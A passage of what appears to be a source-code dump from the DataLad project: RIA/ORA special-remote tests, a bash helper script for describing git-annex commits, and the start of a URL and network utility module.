f\"ria+{storeurl}\",\n LocalIO(),\n storepath,\n )\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http(use_ssl=True)\ndef test_initremote_basic_httpsurl(storepath=None, storeurl=None):\n _test_initremote_basic(\n f\"ria+{storeurl}\",\n LocalIO(),\n storepath,\n )\n\n\n@skip_wo_symlink_capability\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_initremote_alias(host, ds_path, store):\n\n ds_path = Path(ds_path)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n if host:\n url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n url = \"ria+{}\".format(store.as_uri())\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n # set up the dataset with alias\n create_ds_in_store(io, store, ds.id, '2', '1', 'ali')\n ds.repo.init_remote('ria-remote', options=init_opts)\n assert_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n assert_repo_status(ds.path)\n assert_true(io.exists(store / \"alias\" / \"ali\"))\n\n\ndef test_initremote_alias():\n\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_initremote_alias))('datalad-test')\n _test_initremote_alias(None)\n\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_initremote_rewrite(host, ds_path, store):\n\n # rudimentary repetition of test_initremote_basic, but\n # with url.<base>.insteadOf config, which should not only\n # be respected, but lead to the rewritten URL stored in\n # git-annex:remote.log\n\n ds_path = Path(ds_path)\n store = Path(store)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n url = \"mystore:\"\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n if host:\n replacement = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n replacement = \"ria+{}\".format(store.as_uri())\n\n ds.config.set(\"url.{}.insteadOf\".format(replacement), url, scope='local')\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n create_store(io, store, '1')\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # run initremote and check what's stored:\n ds.repo.init_remote('ria-remote', options=init_opts)\n assert_in('ria-remote',\n [cfg['name']\n for uuid, cfg in 
ds.repo.get_special_remotes().items()]\n )\n # git-annex:remote.log should have:\n # - rewritten url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(replacement), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n\ndef test_initremote_rewrite():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_initremote_rewrite))('datalad-test')\n _test_initremote_rewrite(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef _test_remote_layout(host, dspath, store, archiv_store):\n\n dspath = Path(dspath)\n store = Path(store)\n archiv_store = Path(archiv_store)\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n arch_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=archiv_store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n arch_url = \"ria+{}\".format(archiv_store.as_uri())\n\n create_store(io, store, '1')\n\n # TODO: Re-establish test for version 1\n # version 2: dirhash\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n # copy files into the RIA store\n ds.push('.', to='store')\n\n # we should see the exact same annex object tree\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(1, store, ds.id)\n store_objects = get_all_files(dsobj_dir)\n local_objects = get_all_files(ds.pathobj / '.git' / 'annex' / 'objects')\n assert_equal(len(store_objects), 4)\n\n if not ds.repo.is_managed_branch():\n # with managed branches the local repo uses hashdirlower instead\n # TODO: However, with dataset layout version 1 this should therefore\n # work on adjusted branch the same way\n # TODO: Wonder whether export-archive-ora should account for that and\n # rehash according to target layout.\n assert_equal(sorted([p for p in store_objects]),\n sorted([p for p in local_objects])\n )\n\n if not io.get_7z():\n raise SkipTest(\"No 7z available in RIA store\")\n\n # we can simply pack up the content of the remote into a\n # 7z archive and place it in the right location to get a functional\n # archive remote\n\n create_store(io, archiv_store, '1')\n create_ds_in_store(io, archiv_store, ds.id, '2', '1')\n\n whereis = ds.repo.whereis('one.txt')\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(1, archiv_store, ds.id)\n ds.export_archive_ora(archive_dir / 'archive.7z')\n init_opts = common_init_opts + ['url={}'.format(arch_url)]\n ds.repo.init_remote('archive', options=init_opts)\n # now fsck the new remote to get the new special remote indexed\n ds.repo.fsck(remote='archive', fast=True)\n assert_equal(len(ds.repo.whereis('one.txt')), len(whereis) + 1)\n # test creating an archive with filters on files\n ds.export_archive_ora(archive_dir / 'archive2.7z', annex_wanted='(include=*.txt)')\n # test with wanted expression of a specific remote\n ds.repo.set_preferred_content(\"wanted\", \"include=subdir/*\", remote=\"store\")\n ds.export_archive_ora(archive_dir / 'archive3.7z', remote=\"store\")\n # test with the current sha\n ds.export_archive_ora(\n archive_dir / 'archive4.7z',\n 
froms=ds.repo.get_revisions()[1],\n )\n\n\n@slow # 12sec + ? on travis\n# TODO: Skipped due to gh-4436\n@known_failure_windows\n@skip_ssh\ndef test_remote_layout_ssh():\n _test_remote_layout('datalad-test')\n\ndef test_remote_layout():\n _test_remote_layout(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_version_check(host, dspath, store):\n\n dspath = Path(dspath)\n store = Path(store)\n\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n\n create_store(io, store, '1')\n\n # TODO: Re-establish test for version 1\n # version 2: dirhash\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n ds.push('.', to='store')\n\n # check version files\n remote_ds_tree_version_file = store / 'ria-layout-version'\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(1, store, ds.id)\n remote_obj_tree_version_file = dsgit_dir / 'ria-layout-version'\n\n assert_true(remote_ds_tree_version_file.exists())\n assert_true(remote_obj_tree_version_file.exists())\n\n with open(str(remote_ds_tree_version_file), 'r') as f:\n assert_equal(f.read().strip(), '1')\n with open(str(remote_obj_tree_version_file), 'r') as f:\n assert_equal(f.read().strip(), '2')\n\n # Accessing the remote should not yield any output regarding versioning,\n # since it's the \"correct\" version. Note that \"fsck\" is an arbitrary choice.\n # We need just something to talk to the special remote.\n with swallow_logs(new_level=logging.INFO) as cml:\n ds.repo.fsck(remote='store', fast=True)\n # TODO: For some reason didn't get cml.assert_logged to assert\n # \"nothing was logged\"\n assert not cml.out\n\n # Now fake-change the version\n with open(str(remote_obj_tree_version_file), 'w') as f:\n f.write('X\\n')\n\n # Now we should see a message about it\n with swallow_logs(new_level=logging.INFO) as cml:\n ds.repo.fsck(remote='store', fast=True)\n cml.assert_logged(level=\"INFO\",\n msg=\"Remote object tree reports version X\",\n regex=False)\n\n # reading still works:\n ds.drop('.')\n assert_status('ok', ds.get('.'))\n\n # but writing doesn't:\n with open(str(Path(ds.path) / 'new_file'), 'w') as f:\n f.write(\"arbitrary addition\")\n ds.save(message=\"Add a new_file\")\n\n with assert_raises((CommandError, IncompleteResultsError)):\n ds.push('new_file', to='store')\n\n # However, we can force it by configuration\n ds.config.add(\"annex.ora-remote.store.force-write\", \"true\", scope='local')\n ds.push('new_file', to='store')\n\n\n@slow # 17sec + ? 
on travis\n@skip_ssh\n@known_failure_windows\ndef test_version_check_ssh():\n # TODO: Skipped due to gh-4436\n _test_version_check('datalad-test')\n\n\ndef test_version_check():\n _test_version_check(None)\n\n\n# git-annex-testremote is way too slow on crippled FS.\n# Use is_managed_branch() as a proxy and skip only here\n# instead of in a decorator\n@skip_if_adjusted_branch\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_gitannex(host, store, dspath):\n store = Path(store)\n\n dspath = Path(dspath)\n store = Path(store)\n\n ds = Dataset(dspath).create()\n\n populate_dataset(ds)\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n\n create_store(io, store, '1')\n\n # TODO: Re-establish test for version 1\n # version 2: dirhash\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n from datalad.support.external_versions import external_versions\n if '8.20200330' < external_versions['cmd:annex'] < '8.20200624':\n # https://git-annex.branchable.com/bugs/testremote_breeds_way_too_many_instances_of_the_externals_remote/?updated\n raise SkipTest(\n \"git-annex might lead to overwhelming number of external \"\n \"special remote instances\")\n\n # run git-annex-testremote\n # note, that we don't want to capture output. If something goes wrong we\n # want to see it in test build's output log.\n ds.repo._call_annex(['testremote', 'store'], protocol=NoCapture)\n\n\n@turtle\n@known_failure_windows # TODO: Skipped due to gh-4436\n@skip_ssh\ndef test_gitannex_ssh():\n _test_gitannex('datalad-test')\n\n\n@slow # 41sec on travis\ndef test_gitannex_local():\n _test_gitannex(None)\n\n\n@known_failure_windows # see gh-4469\n@with_tempfile\n@with_tempfile\ndef _test_binary_data(host, store, dspath):\n # make sure, special remote deals with binary data and doesn't\n # accidentally involve any decode/encode etc.\n\n dspath = Path(dspath)\n store = Path(store)\n\n url = \"https://github.com/datalad/example-dicom-functional/blob/master/dicoms/MR.1.3.46.670589.11.38317.5.0.4476.2014042516042547586\"\n file = \"dicomfile\"\n ds = Dataset(dspath).create()\n ds.download_url(url, path=file, message=\"Add DICOM file from github\")\n assert_repo_status(ds.path)\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=store)\n else:\n store_url = \"ria+{}\".format(store.as_uri())\n\n create_store(io, store, '1')\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # add special remote\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n # actual data transfer (both directions)\n # Note, that we intentionally call annex commands instead of\n # datalad-publish/-get here. 
We are testing an annex-special-remote.\n\n store_uuid = ds.siblings(name='store',\n return_type='item-or-list')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list')['annex-uuid']\n\n known_sources = ds.repo.whereis(str(file))\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n ds.repo.call_annex(['move', str(file), '--to', 'store'])\n known_sources = ds.repo.whereis(str(file))\n assert_not_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n ds.repo.call_annex(['get', str(file), '--from', 'store'])\n known_sources = ds.repo.whereis(str(file))\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n\n\ndef test_binary_data():\n # TODO: Skipped due to gh-4436\n known_failure_windows(skip_ssh(_test_binary_data))('datalad-test')\n skip_if_no_network(_test_binary_data)(None)\n\n\n@known_failure_windows\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_push_url(storepath=None, dspath=None, blockfile=None):\n\n dspath = Path(dspath)\n store = Path(storepath)\n blockfile = Path(blockfile)\n blockfile.touch()\n\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n assert_repo_status(ds.path)\n repo = ds.repo\n\n # set up store:\n io = LocalIO()\n store_url = \"ria+{}\".format(store.as_uri())\n create_store(io, store, '1')\n create_ds_in_store(io, store, ds.id, '2', '1')\n\n # initremote fails with invalid url (not a ria+ URL):\n invalid_url = (store.parent / \"non-existent\").as_uri()\n init_opts = common_init_opts + ['url={}'.format(store_url),\n 'push-url={}'.format(invalid_url)]\n assert_raises(CommandError, ds.repo.init_remote, 'store', options=init_opts)\n\n # initremote succeeds with valid but inaccessible URL (pointing to a file\n # instead of a store):\n block_url = \"ria+\" + blockfile.as_uri()\n init_opts = common_init_opts + ['url={}'.format(store_url),\n 'push-url={}'.format(block_url)]\n repo.init_remote('store', options=init_opts)\n\n store_uuid = ds.siblings(name='store',\n return_type='item-or-list')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list')['annex-uuid']\n\n # but a push will fail:\n assert_raises(CommandError, ds.repo.call_annex,\n ['copy', 'one.txt', '--to', 'store'])\n\n # reconfigure w/ local overwrite:\n repo.config.add(\"remote.store.ora-push-url\", store_url, scope='local')\n # push works now:\n repo.call_annex(['copy', 'one.txt', '--to', 'store'])\n\n # remove again (config and file from store)\n repo.call_annex(['move', 'one.txt', '--from', 'store'])\n repo.config.unset(\"remote.store.ora-push-url\", scope='local')\n repo.call_annex(['fsck', '-f', 'store'])\n known_sources = repo.whereis('one.txt')\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n\n # reconfigure (this time committed)\n init_opts = common_init_opts + ['url={}'.format(store_url),\n 'push-url={}'.format(store_url)]\n repo.enable_remote('store', options=init_opts)\n\n # push works now:\n repo.call_annex(['copy', 'one.txt', '--to', 'store'])\n known_sources = repo.whereis('one.txt')\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n\n\n# create-sibling-ria cannot handle windows paths\n@known_failure_windows\n@with_tempfile\n@with_tempfile\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_url_keys(dspath=None, storepath=None, httppath=None, httpurl=None):\n ds = Dataset(dspath).create()\n repo = ds.repo\n filename = 'url_no_size.html'\n # URL-type key without size\n repo.call_annex([\n 
'addurl', '--relaxed', '--raw', '--file', filename, httpurl,\n ])\n ds.save()\n # copy target\n ds.create_sibling_ria(\n name='ria',\n url='ria+file://{}'.format(storepath),\n storage_sibling='only',\n new_store_ok=True\n )\n ds.get(filename)\n repo.call_annex(['copy', '--to', 'ria', filename])\n ds.drop(filename)\n # in the store and on the web\n assert_equal(len(ds.repo.whereis(filename)), 2)\n # try download, but needs special permissions to even be attempted\n ds.config.set('annex.security.allow-unverified-downloads', 'ACKTHPPT', scope='local')\n repo.call_annex(['copy', '--from', 'ria', filename])\n assert_equal(len(ds.repo.whereis(filename)), 3)\n # smoke tests that execute the remaining pieces with the URL key\n repo.call_annex(['fsck', '-f', 'ria'])\n assert_equal(len(ds.repo.whereis(filename)), 3)\n # mapped key in whereis output\n assert_in('127.0.0.1', repo.call_annex(['whereis', filename]))\n\n repo.call_annex(['move', '-f', 'ria', filename])\n # check that it does not magically reappear, because it actually\n # did not drop the file\n repo.call_annex(['fsck', '-f', 'ria'])\n assert_equal(len(ds.repo.whereis(filename)), 2)\n\n\ndef test_sanitize_key():\n for i, o in (\n ('http://example.com/', 'http&c%%example.com%'),\n ('/%&:', '%&s&a&c'),\n ):\n assert_equal(_sanitize_key(i), o)\n\n\n# Skipping on adjusted branch as a proxy for crippledFS. Write permissions of\n# the owner on a directory can't be revoked on VFAT. \"adjusted branch\" is a\n# bit broad but covers the CI cases. And everything RIA/ORA doesn't currently\n# properly run on crippled/windows anyway. Needs to be more precise when\n# RF'ing will hopefully lead to support on windows in principle.\n@skip_if_adjusted_branch\n@known_failure_windows\n@with_tempfile\n@with_tempfile\ndef _test_permission(host, storepath, dspath):\n\n # Test whether ORA correctly revokes and obtains write permissions within\n # the annex object tree. That is: Revoke after ORA pushed a key to store\n # in order to allow the object tree to safely be used with an ephemeral\n # clone. 
And on removal obtain write permissions, like annex would\n # internally on a drop (but be sure to restore if something went wrong).\n\n dspath = Path(dspath)\n storepath = Path(storepath)\n ds = Dataset(dspath).create()\n populate_dataset(ds)\n ds.save()\n assert_repo_status(ds.path)\n testfile = 'one.txt'\n\n # set up store:\n io = SSHRemoteIO(host) if host else LocalIO()\n if host:\n store_url = \"ria+ssh://{host}{path}\".format(host=host,\n path=storepath)\n else:\n store_url = \"ria+{}\".format(storepath.as_uri())\n\n create_store(io, storepath, '1')\n create_ds_in_store(io, storepath, ds.id, '2', '1')\n _, _, obj_tree = get_layout_locations(1, storepath, ds.id)\n assert_true(obj_tree.is_dir())\n file_key_in_store = obj_tree / 'X9' / '6J' / 'MD5E-s8--7e55db001d319a94b0b713529a756623.txt' / 'MD5E-s8--7e55db001d319a94b0b713529a756623.txt'\n\n init_opts = common_init_opts + ['url={}'.format(store_url)]\n ds.repo.init_remote('store', options=init_opts)\n\n store_uuid = ds.siblings(name='store',\n return_type='item-or-list')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list')['annex-uuid']\n\n known_sources = ds.repo.whereis(testfile)\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n assert_false(file_key_in_store.exists())\n\n ds.repo.call_annex(['copy', testfile, '--to', 'store'])\n known_sources = ds.repo.whereis(testfile)\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n assert_true(file_key_in_store.exists())\n\n # Revoke write permissions from parent dir in-store to test whether we\n # still can drop (if we can obtain the permissions). Note, that this has\n # no effect on VFAT.\n file_key_in_store.parent.chmod(file_key_in_store.parent.stat().st_mode &\n ~stat.S_IWUSR)\n # we can't directly delete; key in store should be protected\n assert_raises(PermissionError, file_key_in_store.unlink)\n\n # ORA can still drop, since it obtains permission to:\n ds.repo.call_annex(['drop', testfile, '--from', 'store'])\n known_sources = ds.repo.whereis(testfile)\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n assert_false(file_key_in_store.exists())\n\n\n@skip_ssh\ndef test_obtain_permission_ssh():\n _test_permission('datalad-test')\n\n@skip_if_root\ndef test_obtain_permission_root():\n _test_permission(None)\n" }, { "alpha_fraction": 0.6206554174423218, "alphanum_fraction": 0.6325719952583313, "avg_line_length": 22.9761905670166, "blob_id": "1d16ab6d77a4b7e6ef38fbf9515a6d3e754ca4d8", "content_id": "77a1b18def1f9ac8edb20633fe1107435d9b9bf4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1007, "license_type": "permissive", "max_line_length": 118, "num_lines": 42, "path": "/tools/describegitannex", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncommit=\"$1\"\n\n: ${GIT_ANNEX_SRCPATH:=~/proj/git-annex}\n: ${GIT_ANNEX_USER:=yarikoptic}\n\nfunction indent() {\n\tsed -e 's,^, ,g'\n}\n\nfunction pull() {\n\techo \"I: pull --rebase\"\n\tgit pull --rebase 2>&1 | indent\n}\n\nset -eu\nbuiltin cd \"$GIT_ANNEX_SRCPATH\"\n\nif [[ -z \"$commit\" ]]; then\n\tpull\n\techo \"I: Differences from Joey:\"\n\tgit diff origin/master.. 
2>&1 | indent\n\t# life is too short to discover correct way\n\tcommit=$(git show | head -n1 | awk '{print $2;}')\nfi\n\necho \"I: Head of the last commit:\"\n{ git show \"$commit\" | head -n 10 || { echo \"not found; fetching\"; pull; git show \"$commit\" | head -n 10; } } | indent\n\ndesc=$(git describe \"$commit\")\ndesc_contains=$(git describe --contains \"$commit\" 2>/dev/null || echo '')\n\nif [[ ! -z \"$desc_contains\" ]]; then\n\tdesc_contains=\" AKA $desc_contains\"\nfi\n\nmd=\"[$desc$desc_contains](https://git.kitenet.net/index.cgi/git-annex.git/commit/?id=$commit)\"\necho\necho \"I: Markdown links to the commit\"\necho \" $md\"\necho \" > fixed in $md --[[$GIT_ANNEX_USER]]\"\n" }, { "alpha_fraction": 0.5896903872489929, "alphanum_fraction": 0.593467652797699, "avg_line_length": 32.310855865478516, "blob_id": "6cc783903d3ad1266472dd1121252a7b14e3b0ff", "content_id": "77db0b9fb3bf2db0caf053d7c5c42300ae158e09", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40506, "license_type": "permissive", "max_line_length": 116, "num_lines": 1216, "path": "/datalad/support/network.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\nfrom __future__ import annotations\n\nimport logging\n\nlgr = logging.getLogger('datalad.network')\n\nlgr.log(5, \"Importing support.network\")\nimport calendar\nimport email.utils\nimport os\nimport pickle\nimport re\nimport time\nfrom hashlib import md5\nfrom ntpath import splitdrive as win_splitdrive\nfrom os.path import dirname\nfrom os.path import join as opj\nfrom pathlib import PurePosixPath\nfrom urllib.error import URLError\nfrom urllib.parse import (\n ParseResult,\n parse_qsl,\n)\nfrom urllib.parse import quote as urlquote\nfrom urllib.parse import unquote as urlunquote\nfrom urllib.parse import (\n quote,\n urlencode,\n urljoin,\n urlparse,\n urlsplit,\n urlunparse,\n)\nfrom urllib.request import (\n Request,\n url2pathname,\n)\n\nimport iso8601\n\nfrom datalad import (\n cfg,\n consts,\n)\nfrom datalad.support.cache import lru_cache\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.utils import (\n Path,\n PurePath,\n ensure_bytes,\n ensure_dir,\n ensure_unicode,\n map_items,\n on_windows,\n)\n\n# !!! Lazily import requests where needed -- needs 30ms or so\n# import requests\n\n\ndef local_path_representation(path: str) -> str:\n \"\"\"Return an OS-specific representation of a Posix-style path\n\n With a posix path in the form of \"a/b\" this function will return \"a/b\" on\n Unix-like operating systems and \"a\\\\b\" on Windows-style operating systems.\n \"\"\"\n return str(Path(path))\n\n\ndef local_url_path_representation(url_path: str) -> str:\n \"\"\"Return an OS-specific representation of the path component in a file:-URL\n\n With a path component like \"/c:/Windows\" (i.e. 
from a URL that reads\n \"file:///c:/Windows\"), this function will return \"/c:/Windows\" on a\n Unix-like operating systems and \"C:\\\\Windows\" on Windows-like operating\n systems.\n \"\"\"\n return url2pathname(quote(url_path))\n\n\ndef local_path_from_url(url: str) -> str:\n \"\"\"Parse the url and extract an OS-specific local path representation\"\"\"\n return local_url_path_representation(urlparse(url).path)\n\n\ndef is_windows_path(path):\n win_split = win_splitdrive(path)\n # Note, that ntpath.splitdrive also deals with UNC paths. In that case\n # the \"drive\" wouldn't be a windows drive letter followed by a colon\n if win_split[0] and win_split[1] and \\\n win_split[0].endswith(\":\") and len(win_split[0]) == 2:\n # seems to be a windows path\n return True\n return False\n\n\ndef get_response_disposition_filename(s):\n \"\"\"Given a string s as from HTTP Content-Disposition field in the response\n return possibly present filename if any\n \"\"\"\n if not s:\n return None\n # If the response has Content-Disposition, try to get filename from it\n cd = map(\n lambda x: x.strip().split('=', 1) if '=' in x else [x.strip(), ''],\n s.split(';')\n )\n # unify the key to be lower case and make it into a dict\n cd = dict([[x[0].lower()] + x[1:] for x in cd])\n if 'filename' in cd:\n filename = cd['filename'].strip(\"\\\"'\")\n return filename\n return None\n\n\ndef get_url_disposition_filename(url, headers=None):\n \"\"\"Get filename as possibly provided by the server in Content-Disposition\n \"\"\"\n if headers is None:\n request = Request(url)\n r = retry_urlopen(request)\n # things are different in requests\n if 'requests.' in str(r.__class__):\n headers = r.headers\n else:\n headers = r.info()\n else:\n r = None\n try:\n return get_response_disposition_filename(headers.get('Content-Disposition', ''))\n finally:\n if r:\n r.close()\n\n\ndef get_url_straight_filename(url, strip=None, allowdir=False):\n \"\"\"Get file/dir name of the last path component of the URL\n\n Parameters\n ----------\n strip: list, optional\n If provided, listed names will not be considered and their\n parent directory will be selected\n allowdir: bool, optional\n If url points to a \"directory\" (ends with /), empty string\n would be returned unless allowdir is True, in which case the\n name of the directory would be returned\n \"\"\"\n path = urlunquote(urlsplit(url).path)\n path_parts = path.split('/')\n\n if allowdir:\n # strip empty ones\n while len(path_parts) > 1 and not path_parts[-1]:\n path_parts = path_parts[:-1]\n\n if strip:\n while path_parts and path_parts[-1] in strip:\n path_parts = path_parts[:-1]\n\n if path_parts:\n return path_parts[-1]\n else:\n return None\n\n\ndef get_url_filename(url, headers=None, strip=None):\n \"\"\"Get filename from the url, first consulting server about Content-Disposition\n \"\"\"\n filename = get_url_disposition_filename(url, headers)\n if filename:\n return filename\n return get_url_straight_filename(url, strip=strip)\n\n\ndef get_url_response_stamp(url, response_info):\n size, mtime = None, None\n if 'Content-length' in response_info:\n size = int(response_info['Content-length'])\n if 'Last-modified' in response_info:\n mtime = calendar.timegm(email.utils.parsedate(\n response_info['Last-modified']))\n return dict(size=size, mtime=mtime, url=url)\n\n\ndef get_tld(url):\n \"\"\"Return top level domain from a url\n\n Parameters\n ----------\n url : str\n \"\"\"\n # maybe use this instead to be safe: https://pypi.python.org/pypi/tld\n if not url.strip():\n raise 
ValueError(\"Empty URL has no TLD\")\n rec = urlsplit(url)\n if not rec.netloc:\n if not rec.scheme:\n # There were no scheme provided thus netloc was empty -- must have been a simple 'path like'\n return url.split('/', 1)[0]\n else:\n raise ValueError(\"It seems that only the scheme was provided without the net location/TLD\")\n return rec.netloc\n\n\nfrom email.utils import (\n mktime_tz,\n parsedate_tz,\n)\n\n\ndef rfc2822_to_epoch(datestr):\n \"\"\"Given rfc2822 date/time format, return seconds since epoch\"\"\"\n return mktime_tz(parsedate_tz(datestr))\n\n\ndef iso8601_to_epoch(datestr):\n \"\"\"Given ISO 8601 date/time format, return in seconds since epoch\n\n iso8601 is used to parse properly the time zone information, which\n can't be parsed with standard datetime strptime\n \"\"\"\n return calendar.timegm(iso8601.parse_date(datestr).utctimetuple())\n\n\ndef __urlopen_requests(url):\n # XXX Workaround for now for ... broken code\n if isinstance(url, Request):\n url = url.get_full_url()\n from requests import Session\n return Session().get(url, stream=True)\n\n\ndef retry_urlopen(url, retries=3):\n for t in range(retries):\n try:\n return __urlopen_requests(url)\n except URLError as e:\n lgr.warning(\"Received exception while reading %s: %s\" % (url, e))\n if t == retries - 1:\n # if we have reached allowed number of retries -- reraise\n raise\n\n\ndef is_url_quoted(url):\n \"\"\"Return whether URL looks being already quoted\n \"\"\"\n try:\n url_ = urlunquote(url)\n return url != url_\n except: # problem with unquoting -- then it must be wasn't quoted (correctly)\n # MIH: ValueError?\n return False\n\n\ndef same_website(url_rec, u_rec):\n \"\"\"Decide whether a link leads to external site\n\n Parameters\n ----------\n url_rec: ParseResult\n record for original url\n u_rec: ParseResult\n record for new url\n \"\"\"\n if isinstance(url_rec, str):\n url_rec = urlparse(url_rec)\n if isinstance(u_rec, str):\n u_rec = urlparse(u_rec)\n return (url_rec.netloc == u_rec.netloc)\n # todo: collect more of sample cases.\n # disabled below check while working on ratholeradio, since links\n # could go to the parent and that is ok. 
Figure out when it was\n # desired not to go to the parent -- we might need explicit option\n # and u_rec.path.startswith(url_rec.path)):\n\n\ndef dlurljoin(u_path, url):\n url_rec = urlparse(url) # probably duplicating parsing :-/ TODO\n if url_rec.scheme:\n # independent full url, so just return it\n return url\n if u_path.endswith('/'): # should here be also a scheme use?\n if url.startswith('/'): # jump to the root\n u_path_rec = urlparse(u_path)\n return urljoin(urlunparse(\n (u_path_rec.scheme, u_path_rec.netloc, '', '', '', '')), url)\n else:\n return os.path.join(u_path, url)\n # TODO: recall where all this dirname came from and bring into the test\n return urljoin(os.path.dirname(u_path) + '/', url)\n\n\n# TODO should it be a node maybe?\nclass SimpleURLStamper(object):\n \"\"\"Gets a simple stamp about the URL: {url, time, size} of whatever was provided in the header\n \"\"\"\n def __init__(self, mode='full'):\n self.mode = mode\n\n def __call__(self, url):\n # Extracted from above madness\n # TODO: add mode alike to 'relaxed' where we would not\n # care about content-disposition filename\n # http://stackoverflow.com/questions/862173/how-to-download-a-file-using-python-in-a-smarter-way\n request = Request(url)\n\n # No traffic compression since we do not know how to identify\n # exactly either it has to be decompressed\n # request.add_header('Accept-encoding', 'gzip,deflate')\n #\n # TODO: think about stamping etc -- we seems to be redoing\n # what git-annex does for us already... not really\n r = retry_urlopen(request)\n try:\n r_info = r.info()\n r_stamp = get_url_response_stamp(url, r_info)\n\n return dict(mtime=r_stamp['mtime'], size=r_stamp['size'], url=url)\n finally:\n r.close()\n\n\n# TODO: make it consistent/clear at what stage % encoding/decoding happens!\n# now it is a mix!\n\n#\n# Useful functionality in requests.models\n# utils.requote_uri -- quote/unquote cycle to guarantee consistent appearance\n# RequestEncodingMixin._encode_params -- Will successfully encode parameters when passed as a dict or a list of ...\n# PreparedRequest().prepare_url(url, params) -- nicely cares about url encodings etc\n#\n\n@lru_cache(maxsize=100)\ndef _guess_ri_cls(ri):\n \"\"\"Factory function which would determine which type of a ri a provided string is\"\"\"\n TYPES = {\n 'url': URL,\n 'ssh': SSHRI,\n 'file': PathRI,\n 'datalad': DataLadRI,\n 'git-transport': GitTransportRI,\n }\n if isinstance(ri, PurePath):\n lgr.log(5, \"Detected file ri\")\n return TYPES['file']\n if is_windows_path(ri):\n # OMG we got something from windows\n lgr.log(5, \"Detected file ri\")\n return 